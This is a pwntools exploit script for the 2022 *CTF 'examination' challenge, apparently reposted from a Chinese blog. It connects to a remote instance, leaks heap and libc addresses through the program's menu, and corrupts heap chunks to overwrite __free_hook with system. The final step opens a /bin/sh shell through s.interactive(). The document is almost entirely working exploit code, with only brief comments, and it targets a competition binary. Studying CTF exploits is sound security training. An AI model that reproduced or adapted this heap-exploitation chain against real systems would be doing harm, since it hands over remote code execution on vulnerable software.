2022 *CTF examination
exp (exploit script)
from pwn import*
# Tube logging at debug level and a 64-bit target, set in one call.
context.update(log_level='debug', arch='amd64')
#s = process('./examination')
# Remote instance used for the write-up.
s = remote('124.70.130.92', 60001)
# NOTE(review): the local system libc is used for symbol offsets; the script
# assumes it is the same build as the one running on the remote.
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
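def init_role(role):
    """Answer the initial role prompt.

    Args:
        role: 0 for teacher, 1 for student (the legend printed by the prompt itself).
    """
    # Encode explicitly so every payload in this file is bytes, like the menu literals.
    s.sendlineafter(b'role: <0.teacher/1.student>: ', str(role).encode())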
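def add_s(num):
    """Menu option 1: add `num` questions (answers the count prompt).

    Args:
        num: number of questions, sent as decimal text.
    """
    s.sendlineafter(b'choice>> ', b'1')
    # Encode explicitly to keep every payload in bytes, consistent with the literals above.
    s.sendlineafter(b'enter the number of questions: ', str(num).encode())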
def give_score():
    """Menu option 2: give scores. No further prompt is answered here."""
    choice = b'2'
    s.sendlineafter(b'choice>> ', choice)
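def write_view(c, index, size, comment):
    """Menu option 3: submit a comment for entry `index`.

    Args:
        c: truthy -> skip the size prompt and send the comment directly;
           falsy -> answer the size prompt with `size` first.
        index: entry number, sent as decimal text.
        size: comment size, only used when `c` is falsy.
        comment: raw bytes, sent with `sendafter` (no newline is appended).
    """
    s.sendlineafter(b'choice>> ', b'3')
    # Encode explicitly so all payloads in this file are bytes, like the menu literals.
    s.sendlineafter(b'which one? > ', str(index).encode())
    if not c:
        s.sendlineafter(b'please input the size of comment: ', str(size).encode())
    # Both branches of the original end with the same send; merged into one line.
    s.sendafter(b'enter your comment:\n', comment)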
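def call_parent(index):
    """Menu option 4: choose student `index` at the id prompt.

    Args:
        index: student id, sent as decimal text.
    """
    s.sendlineafter(b'choice>> ', b'4')
    # Encode explicitly to keep every payload in bytes, consistent with the literals above.
    s.sendlineafter(b'which student id to choose?', str(index).encode())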
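def change_role(role):
    """Menu option 5: switch role, then answer the role prompt.

    Args:
        role: 0 for teacher, 1 for student (the legend printed by the prompt itself).
    """
    s.sendlineafter(b'choice>> ', b'5')
    # Encode explicitly to keep every payload in bytes, consistent with the literals above.
    s.sendlineafter(b'role: <0.teacher/1.student>: ', str(role).encode())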
def t_exit():
    """Menu option 6. Same option number as change_id(); which one the
    program interprets presumably depends on the active role."""
    choice = b'6'
    s.sendlineafter(b'choice>> ', choice)
def test():
    """Menu option 1 (same number as add_s(); presumably the other role's menu)."""
    choice = b'1'
    s.sendlineafter(b'choice>> ', choice)
def check(ptr):
    """Menu option 2, then answer the address prompt with `ptr` as given.

    `ptr` is passed through to `sendafter` unchanged (caller supplies the text/bytes).
    Note: the main sequence below answers this same prompt inline and never calls check().
    """
    choice = b'2'
    s.sendlineafter(b'choice>> ', choice)
    s.sendafter(b'add 1 to wherever you want! addr: ', ptr)
def pray():
    """Menu option 3 (no further prompt is answered here)."""
    choice = b'3'
    s.sendlineafter(b'choice>> ', choice)
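def mode(p, score, mode):
    """Menu option 4: send either a pray score or a mode string.

    Args:
        p: truthy -> answer the score prompt with `score`;
           falsy -> answer the mode prompt with `mode` (raw, no newline appended).
        score: integer, the prompt text says 0 to 100; sent as decimal text.
        mode: raw bytes for the mode prompt.

    NOTE: the parameter `mode` shadows the function name inside the body;
    kept as-is so existing positional/keyword calls keep working.
    """
    s.sendlineafter(b'choice>> ', b'4')
    if p:
        # Encode explicitly to keep every payload in bytes, consistent with the literals above.
        s.sendlineafter(b'enter your pray score: 0 to 100\n', str(score).encode())
    else:
        s.sendafter(b'enter your mode!\n', mode)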
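def change_id(index):
    """Menu option 6: change the current id.

    Args:
        index: id value, sent as decimal text.
    """
    s.sendlineafter(b'choice>> ', b'6')
    # Encode explicitly to keep every payload in bytes, consistent with the literals above.
    s.sendlineafter(b'input your id: ', str(index).encode())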
#0x5080
# --- Interaction sequence. Every step is a menu round-trip over `s`; the order matters. ---
init_role(0)
add_s(1) # 0
add_s(1) # 1
add_s(1) # 2
# Three 0x80-byte comments (size prompt answered, since the first argument is 0).
write_view(0,0,0x80,b'a'*0x80)
write_view(0,1,0x80,b'a'*0x80)
write_view(0,2,0x80,b'a'*0x80)
change_role(1)
pray()
change_id(2)
pray()
change_role(0)
give_score()
change_role(1)
change_id(2)
# Option 2 inline (same prompt check() handles). The reply is expected to carry an
# address right after the reward banner; 14 bytes presumably covers '0x' + 12 hex digits.
s.sendlineafter(b'choice>> ', b'2')
s.recvuntil(b'Good Job! Here is your reward! ')
# 0x340 is the author's offset from the leaked value back to the heap base.
heap_base = int(s.recv(14),16) - 0x340
success('heap_base=> '+hex(heap_base))
ptr = heap_base + 0x1f
success('ptr1=>'+hex(ptr))
# The address is sent as decimal text (str of an int).
s.sendafter(b'add 1 to wherever you want! addr: ', str(ptr))
change_role(0)
add_s(1) # 3
write_view(0,3,0x80,b'a'*0x80)
call_parent(1)
change_role(1)
# Second leak, same mechanism; a different offset (0x2a0) is used this time.
s.sendlineafter(b'choice>> ', b'2')
s.recvuntil(b'Good Job! Here is your reward! ')
heap_base = int(s.recv(14),16) - 0x2a0
success('heap_base=> '+hex(heap_base))
ptr = heap_base + 0x2e2
success('ptr2=>'+hex(ptr))
s.sendafter(b'add 1 to wherever you want! addr: ', str(ptr))
# Pointer leak: read through the first 0x7f byte, keep the trailing 6 bytes, zero-pad to 8,
# unpack little-endian. 0x1ecbe0 is the author's offset for the libc build on the remote.
libc_base = u64(s.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x1ecbe0
success('libc_base=>' +hex(libc_base))
system = libc_base + libc.sym['system']
change_role(0)
# Payload assembled by the author; every constant here is specific to this
# binary's heap layout and the remote's libc build.
payload = b'/bin/sh\x00' + b'a'*0x80 + p64(0x91) + b'b'*0x80 + p64(0x90)*2 + b'c'*0x88
payload+= p64(0x31) + p64(heap_base + 0x570) + b'\x00'*0x20
payload+= p64(0x21) + p64(0x1) + p64(libc_base + libc.sym['__free_hook'])
# First argument 1: no size prompt is answered for these two writes.
write_view(1,0,0x80,payload)
# Sends the packed `system` address as entry 3's comment.
write_view(1,3,0x80,p64(system))
call_parent(0)
#gdb.attach(s)
s.interactive()
本文来自博客园,作者:{狒猩橙},转载请注明原文链接:https://www.cnblogs.com/pwnfeifei/p/16250158.html